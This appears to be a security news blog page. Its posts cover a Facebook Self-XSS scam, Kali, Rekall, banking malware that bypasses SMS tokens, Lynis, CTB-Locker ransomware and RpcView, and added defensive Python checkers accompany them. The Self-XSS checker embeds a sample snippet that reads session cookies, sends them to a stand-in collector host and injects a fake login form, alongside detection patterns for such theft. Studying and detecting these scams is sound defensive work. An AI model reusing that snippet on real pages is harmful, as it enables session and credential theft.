More Self-XSS Scams Targeting Facebook Accounts

Social networks continue to be one of the resources that cyber criminals use to spread their attacks. Self-XSS is a newer technique used to compromise Facebook accounts: the victim is tricked into running malicious JavaScript (or other client-side code) in their own browser. Because the code runs inside the victim's authenticated session, it can give the attacker access to the account for fraud and spam, and it spreads further by posting the same lure on the victim's timeline to their friend list.

In this case the attackers claim to offer a way to hack any Facebook user by following some simple steps, but they are actually running a Self-XSS attack by urging users to paste the malicious code into their browser's developer console. The code signs the victim out and asks them to log in once more through a fake login form, and the attacker receives the victim's username and password.

The posted scam looks as follows:

Hack any Facebook account following these steps:

1. Go to the victim’s profile
2. Right-click, then click on Inspect Element and click the “Console” tab.
3. Paste the code into the box at the bottom and press Enter.

The code is in the web site: http://textuploader .com****/

Good luck: *

Don’t hurt anybody…

Screenshot: Self-XSS scam post

To avoid Self-XSS scams, never paste code or links from unknown sources into your browser. You can also report the post using the small triangle tab in the upper right-hand corner of each post and selecting “Report/Mark as spam” from the drop-down menu. If you want to check the URL, use a virtual environment with a sandbox, as described in this post: http://www.sectechno.com/2010/10/03/playing-around-malwares/
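As an added illustration (not code from the original post or from Facebook), here is a small Python triage helper for the kind of snippet these scams ask victims to paste. It scans a snippet for the behaviours described above (reading cookies, sending data to another origin, forcing a logout, rewriting the page into a fake login form, hiding code behind eval/atob) and gives a rough verdict. The sample snippet, the indicator list and the `collector.example` hostname are constructed for this example.

```python
import re

# Constructed snippet modelled on the behaviour described above; it is not
# the code from the original scam post and the collector hostname is made up.
SAMPLE_SNIPPET = r'''
var c = document.cookie;
var i = new Image();
i.src = "http://collector.example/c?d=" + encodeURIComponent(c);
document.body.innerHTML = '<form action="http://collector.example/login">...</form>';
location.href = "https://www.facebook.com/logout.php";
eval(atob("YWxlcnQoMSk="));
'''

# Indicators of the behaviours these pasted snippets rely on. Each is a
# (description, pattern) pair; the patterns are heuristics, not proof.
INDICATORS = [
    ("reads session cookies", re.compile(r"document\.cookie")),
    ("sends data to another origin",
     re.compile(r"https?://(?!www\.facebook\.com)[a-z0-9.-]+", re.I)),
    ("forces a logout or navigation",
     re.compile(r"logout|location\.(?:href|replace)|location\s*=")),
    ("rewrites the page (fake login form)",
     re.compile(r"innerHTML|createElement\(\s*['\"]form")),
    ("hides code behind eval/atob",
     re.compile(r"\beval\(|\batob\(|\bFunction\(")),
    ("acts with the victim's session",
     re.compile(r"XMLHttpRequest|\bfetch\(|\.submit\(")),
]


def self_xss_indicators(snippet):
    """Return the descriptions of every indicator found in the snippet."""
    return [name for name, rx in INDICATORS if rx.search(snippet)]


def triage(snippet):
    """Classify a snippet: two or more indicators is treated as likely self-XSS."""
    hits = self_xss_indicators(snippet)
    verdict = "likely self-XSS" if len(hits) >= 2 else "low signal"
    return verdict, hits


if __name__ == "__main__":
    verdict, hits = triage(SAMPLE_SNIPPET)
    print(verdict)
    for h in hits:
        print(" -", h)
```

The threshold of two indicators is deliberately loose: a single `location.href` to the site itself is normal, while cookie access combined with a request to a foreign host is the signature the post describes.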


New release Kali Linux 1.0.8

A new release has been announced for Kali Linux, a distribution that includes more than 300 penetration testing tools. The new version is Kali Linux 1.0.8 and adds UEFI boot support, so the full system can be carried on a USB device. This simplifies usage: you no longer need to install the system or burn an ISO image; it is enough to boot from the USB device or use it in a VM that supports EFI boot.

According to the release notes:

  1. New tools added (Parsero, ghost-phisher, Nishang 0.3)
  2. Tool upgrades (SSLsplit, Armitage, Recon-ng, dnsrecon, Responder, Automater)
  3. Bug fixes requested since the previous release.

If you already have the distribution installed, you can update it with apt-get update && apt-get dist-upgrade. Some of the popular tools are Aircrack-ng for pentesting and cracking wireless networks, Maltego for intelligence gathering and forensics, Metasploit as an exploitation framework, the SAINT network vulnerability assessment scanner, the Kismet wireless network sniffer, Btcrack for Bluetooth passphrase brute forcing, Btscanner for Bluetooth auditing, Nmap and much more.

You can read more about this release over here: http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/


Rekall Memory Forensic Framework

Rekall Framework is an open source collection of tools for forensic analysis. The program is written in Python and gives full visibility into the state of system memory (RAM). Rekall runs on any platform that supports Python and can investigate the following images:

  • Microsoft Windows XP Service Pack 2 and 3
  • Microsoft Windows 7 Service Pack 0 and 1
  • Microsoft Windows 8 and 8.1
  • Linux Kernels 2.6.24 to 3.10.
  • OSX 10.6-10.9.x.

Rekall Framework screenshot

With Rekall you can obtain:

  • session information
  • list of processes
  • list of registers
  • sockets
  • hashed passwords stored in memory

There is also an API that lets you run any search you need over system memory. Installation is possible with pip by running pip install rekall. More information is available on the official website: http://www.rekall-forensic.com/


Malware compromises online payment two-factor authentication process

A new malicious campaign has been observed by TrendMicro targeting Swiss bank customers. The attackers use sophisticated malware that intercepts SMS tokens and changes the DNS configuration to redirect victims to an illegitimate website, giving the cyber criminals full control of the victim's bank account.

The attack starts by infecting the victim's smartphone with a malicious application and redirecting the victim to a phishing web server to capture the user's credentials. The malicious app does the following:

1- Modifies the DNS server setting so that lookups are redirected to a system controlled by the attackers.

2- Installs a new root CA certificate on the infected system. Because the device now trusts that CA, the attackers can serve SSL-secured phishing sites whose certificates chain to it, and the browser shows no warning to the user. SSL encryption is primarily used with the https protocol.

3- Removes the malicious application so as to leave no trace of the attack.

Two-factor authentication process and how the compromise happens, as demonstrated by TrendMicro

This lets the attackers defeat the standard two-factor authentication that many online financial services use to authenticate legitimate users. Looking at the malicious binaries investigated, one of the C&C servers is located in Uzbekistan, while the attack targets users in Switzerland, Austria, and Sweden.
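Two of the three steps above leave durable traces on the device even after the app removes itself: resolver settings that point somewhere unexpected, and a user-installed root CA that nobody approved. As an added example (not TrendMicro's analysis or code), the Python below checks both against a baseline. The `getprop` output, the certificate listing, the expected resolver addresses and the approved CA hash are all constructed; the `net.dns*` properties and the `/data/misc/user/0/cacerts-added` directory are assumptions about where Android 4.x-era devices kept this state.

```python
import re

# Constructed "adb shell getprop" output; only the net.dns* properties matter here.
SAMPLE_GETPROP = """\
[net.dns1]: [198.51.100.53]
[net.dns2]: [198.51.100.54]
[net.hostname]: [android-1234]
[wifi.interface]: [wlan0]
"""

# Constructed directory listing of user-installed CA certificates
# (assumed path /data/misc/user/0/cacerts-added), one "hash.0  subject" per line.
SAMPLE_USER_CAS = """\
a1b2c3d4.0  CN=Corporate MDM Root CA
deadbeef.0  CN=Secure Banking Root
"""

# Baseline the device should match: resolvers handed out by the real network
# and the subject hashes of CAs the organisation deployed on purpose.
EXPECTED_DNS = {"192.0.2.1", "192.0.2.2"}
APPROVED_USER_CAS = {"a1b2c3d4"}

PROP_RE = re.compile(r"^\[([^\]]+)\]: \[([^\]]*)\]$")


def parse_getprop(text):
    """Turn getprop's "[name]: [value]" lines into a dict."""
    props = {}
    for line in text.splitlines():
        m = PROP_RE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props


def rogue_resolvers(props, expected):
    """Return (property, address) pairs for DNS servers outside the expected set."""
    return [(name, value) for name, value in sorted(props.items())
            if name.startswith("net.dns") and value and value not in expected]


def unapproved_user_cas(listing, approved):
    """Return (hash, subject) pairs for user-installed CAs not in the approved set."""
    found = []
    for line in listing.splitlines():
        if not line.strip():
            continue
        filename, _, subject = line.partition("  ")
        subject_hash = filename.split(".")[0]
        if subject_hash not in approved:
            found.append((subject_hash, subject.strip()))
    return found


def device_posture(getprop_text, ca_listing, expected_dns=EXPECTED_DNS,
                   approved_cas=APPROVED_USER_CAS):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for name, addr in rogue_resolvers(parse_getprop(getprop_text), expected_dns):
        findings.append(f"{name} = {addr}: not one of the expected resolvers")
    for subject_hash, subject in unapproved_user_cas(ca_listing, approved_cas):
        findings.append(f"unapproved user-installed root CA {subject_hash} ({subject})")
    return findings


if __name__ == "__main__":
    for f in device_posture(SAMPLE_GETPROP, SAMPLE_USER_CAS):
        print("FINDING:", f)
```

A rogue CA is the more reliable of the two signals: DNS settings change legitimately with every network, but a root CA with a bank's name in the subject that the bank never issued has no benign explanation.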


Lynis v1.5.7- Security auditing and hardening tool

Hardening the operating system is important to protect your environment against compromise. One of the open source tools you can use for hardening Unix and Linux based systems is Lynis. Lynis runs several hundred tests and audits your system: it checks configuration files to find out whether you have the correct settings and reports the gaps it finds on your systems.

Lynis helps you take the right measures, check the related controls and define an improvement plan to meet security standards such as Basel II, GLBA, HIPAA, ISO27001/ISO27002, PCI-DSS and SOx (Sarbanes-Oxley). Lynis performs the compliance scan you need to evaluate your system against these standards, so you get a checklist with an action plan to properly harden your system.

Screenshot of Lynis

At the moment there is an open source version that you can use for security auditing, vulnerability scanning and system hardening, and an enterprise version that adds more components for compliance checking and security. You can download Lynis from this link: http://cisofy.com/products/
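As an added, much-reduced illustration of what a configuration audit of this kind does (this is not Lynis's own code), the Python below parses an sshd_config and checks a handful of controls, reporting a finding for each weak setting and falling back to the daemon's default when an option is absent or commented out. Both configuration fragments are constructed; the control list and thresholds are choices for this example, not a standard's requirements.

```python
# Constructed sshd_config fragments: one weak, one hardened.
WEAK_SSHD_CONFIG = """\
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
X11Forwarding yes
#MaxAuthTries 6
"""

HARDENED_SSHD_CONFIG = """\
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
X11Forwarding no
MaxAuthTries 3
"""

# Controls for this example: (option, predicate on its value, value sshd
# assumes when the option is absent, finding text). Defaults follow
# OpenSSH 6.x of the time; adjust them for your version.
CONTROLS = [
    ("Protocol", lambda v: v == "2", "2",
     "SSH protocol version 1 is enabled"),
    ("PermitRootLogin", lambda v: v in ("no", "without-password"), "yes",
     "root can log in directly over SSH"),
    ("PasswordAuthentication", lambda v: v == "no", "yes",
     "password logins are allowed; prefer keys"),
    ("PermitEmptyPasswords", lambda v: v == "no", "no",
     "empty passwords are accepted"),
    ("X11Forwarding", lambda v: v == "no", "no",
     "X11 forwarding is enabled"),
    ("MaxAuthTries", lambda v: v.isdigit() and int(v) <= 3, "6",
     "more than 3 authentication attempts allowed per connection"),
]


def parse_sshd_config(text):
    """Return {lower-cased option: value}; like sshd, the first occurrence wins."""
    options = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if "=" in key:                      # sshd also accepts "Key=Value"
            key, _, value = key.partition("=")
        key = key.lower()                   # option names are case-insensitive
        options.setdefault(key, value.strip())
    return options


def audit_sshd(text):
    """Return one finding string per control that fails."""
    options = parse_sshd_config(text)
    findings = []
    for name, is_ok, default, message in CONTROLS:
        value = options.get(name.lower(), default)
        if not is_ok(value):
            findings.append(f"{name}={value}: {message}")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        findings = audit_sshd(cfg)
        print(f"{label}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```

The commented-out MaxAuthTries line in the weak configuration is the case a naive grep gets wrong: the option is absent, so the daemon's default applies, and the audit must reason about the default rather than the text.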


CTB-Locker (Critroni) on the rise and using TOR

Attackers keep implementing new strategies to exploit new vulnerabilities and grow their botnets. Critroni is a new malicious program being sold on underground forums. This malware uses the Tor network for its command and control servers to hide their presence and mask the attackers' location.

Critroni can be purchased for 3000 USD and gives the attacker a platform for building spam bots. The bot can install other malicious components and encrypt data like ransomware, asking the victim to pay online to get their files back. Locking the computer is a method cybercriminals use more and more often because it holds the victim's computer hostage, and it is almost impossible to decrypt the files without paying the attackers in bitcoin.

Screenshot after Critroni has locked the files

The problem with such an infection is that the attackers give the victim 72 hours to make the online payment and get their files back; otherwise the files are destroyed and the user loses all the data forever. Using Tor makes it hard to track the attackers because the C&C server is reached through Tor, so the IP addresses seen on the wire do not belong to the cyber criminals.

Here is more information about Critroni: http://malware.dontneedcoffee.com/2014/07/ctb-locker.html?view=classic
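One concrete thing a defender can do with the Tor detail is look for hosts on the network that talk to Tor at all, since most workstations never should. The Python below is an added example (not from the linked analysis) that scans constructed proxy log lines for three signals: hostnames of tor2web-style gateways that expose hidden services over plain HTTP, raw .onion addresses, and connections to the default Tor relay ports. The log lines, the gateway suffix list and the port list are assumptions for this example; the port signal in particular is weak and only corroborating.

```python
import re

# Constructed proxy log lines: "epoch client method target status".
SAMPLE_PROXY_LOG = """\
1406000001 10.0.0.15 GET http://www.example.com/index.html 200
1406000002 10.0.0.15 CONNECT abcdefghijklmnop.onion.to:443 200
1406000003 10.0.0.22 GET http://abcdefghijklmnop.tor2web.org/payment 200
1406000004 10.0.0.15 GET https://static.example.org/logo.png 200
1406000005 10.0.0.31 CONNECT 192.0.2.10:9001 200
1406000006 10.0.0.22 GET http://abcdefghijklmnop.onion/ 503
"""

# Gateways that proxy hidden services to the clear web; a host without a Tor
# client can still reach a payment page this way. The list is illustrative.
TOR2WEB_SUFFIXES = (".onion.to", ".onion.cab", ".tor2web.org", ".onion.link")
# 16-character base32 v2 onion names, the format in use at the time.
ONION_RE = re.compile(r"(?:^|\.)([a-z2-7]{16})\.onion$")
# Default ORPort/DirPort of Tor relays: a weak, corroborating signal only.
TOR_PORTS = {9001, 9030}


def parse_line(line):
    """Split a log line into (client, host, port); port is None if absent."""
    _ts, client, _method, target, _status = line.split()
    target = re.sub(r"^[a-z]+://", "", target, flags=re.I)
    hostport = target.split("/", 1)[0]
    host, _, port = hostport.partition(":")
    return client, host.lower(), int(port) if port.isdigit() else None


def tor_indicators(log_text):
    """Return (client, reason, target) triples for lines that show Tor use."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, host, port = parse_line(line)
        if host.endswith(TOR2WEB_SUFFIXES):
            findings.append((client, "tor2web gateway", host))
        elif ONION_RE.search(host):
            findings.append((client, "onion address", host))
        elif port in TOR_PORTS:
            findings.append((client, "tor relay port", f"{host}:{port}"))
    return findings


def suspect_clients(log_text):
    """Clients worth isolating and checking for encrypted files."""
    return sorted({client for client, _reason, _target in tor_indicators(log_text)})


if __name__ == "__main__":
    for client, reason, target in tor_indicators(SAMPLE_PROXY_LOG):
        print(f"{client:12} {reason:16} {target}")
    print("suspects:", ", ".join(suspect_clients(SAMPLE_PROXY_LOG)))
```

Against the 72-hour deadline the point of such a scan is speed: a client that appears here is worth isolating before the deadline, not after.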


RpcView – Tool to explore RPC functionality

RpcView is a free tool that can be used to monitor and decompile all registered RPC interfaces on Windows operating systems. Information provided by this tool includes the following:

  • the PID of the process hosting the endpoint;
  • the protocol sequence used, the main ones being ncacn_ip_tcp, ncacn_np and ncalrpc;
  • the endpoint name, which depends on the underlying protocol:
    • port number for ncacn_ip_tcp or ncadg_ip_udp
    • pipe name prefixed by \pipe\ for ncacn_np
    • (A)LPC port name for ncalrpc

RpcView interface for exploring RPC processes

Usually RPC interfaces are registered by name, and the tool helps list them so that legitimate ones can be identified. On the other hand there are anonymous RPC interfaces, and for those a security researcher will need to dig deeper and investigate the hosting DLL using this tool.

At the moment there are versions for both 64-bit and 32-bit operating systems, and you can download RpcView from this link: http://rpcview.org/
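The protocol sequence and endpoint fields RpcView shows are the same pieces that make up an RPC string binding (ObjUuid@ProtSeq:NetworkAddr[Endpoint,Options]). As an added example, unrelated to RpcView's own code, the Python below parses such bindings for the protocol sequences listed above and classifies whether the endpoint is reachable from the network (TCP/UDP ports and named pipes over SMB) or only locally (ALPC). The sample bindings and the UUID in them are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Protocol sequences RpcView lists, with what their endpoint field holds.
PROTSEQS = {
    "ncacn_ip_tcp": "TCP port",
    "ncadg_ip_udp": "UDP port",
    "ncacn_np": "named pipe (\\pipe\\name, reached over SMB)",
    "ncalrpc": "(A)LPC port name (local only)",
}
REMOTE_PROTSEQS = {"ncacn_ip_tcp", "ncadg_ip_udp", "ncacn_np"}

# ObjUuid@ProtSeq:NetworkAddr[Endpoint,Option=Value,...]
BINDING_RE = re.compile(
    r"^(?:(?P<uuid>[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})@)?"
    r"(?P<protseq>[a-z_]+):(?P<addr>[^\[]*)(?:\[(?P<ep>[^\]]*)\])?$"
)


@dataclass
class StringBinding:
    protseq: str
    obj_uuid: Optional[str] = None
    network_addr: Optional[str] = None
    endpoint: Optional[str] = None
    options: dict = field(default_factory=dict)


def parse_string_binding(text):
    """Parse an RPC string binding; raises ValueError on unknown or malformed input."""
    m = BINDING_RE.match(text.strip())
    if not m:
        raise ValueError(f"malformed string binding: {text!r}")
    protseq = m.group("protseq")
    if protseq not in PROTSEQS:
        raise ValueError(f"unsupported protocol sequence: {protseq!r}")
    endpoint, options = None, {}
    if m.group("ep") is not None:
        parts = m.group("ep").split(",")
        endpoint = parts[0] or None
        for opt in parts[1:]:                 # options follow the endpoint inside the brackets
            key, _, value = opt.partition("=")
            options[key.strip().lower()] = value.strip()
    return StringBinding(protseq, m.group("uuid"), m.group("addr") or None, endpoint, options)


def exposure(binding):
    """'network' for endpoints reachable from other hosts, 'local' for ALPC."""
    return "network" if binding.protseq in REMOTE_PROTSEQS else "local"


def describe(binding):
    ep = binding.endpoint or "(dynamic endpoint)"
    return f"{binding.protseq}: {PROTSEQS[binding.protseq]} {ep} -> {exposure(binding)}"


# Constructed bindings in the shapes RpcView would show for each protocol sequence.
SAMPLES = [
    "ncacn_ip_tcp:192.0.2.5[135]",
    r"ncacn_np:\\SERVER[\pipe\spoolss]",
    "ncalrpc:[epmapper]",
    "ncadg_ip_udp:192.0.2.5[138]",
    r"12345678-1234-1234-1234-123456789abc@ncacn_np:\\SERVER[\pipe\svcctl,security=identification dynamic true]",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(describe(parse_string_binding(s)))
```

The exposure split is the first triage question when reviewing RpcView's list: an anonymous interface on ncalrpc is only reachable by code already on the box, whereas one on a named pipe is a remote attack surface for anyone who can open the pipe over SMB.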
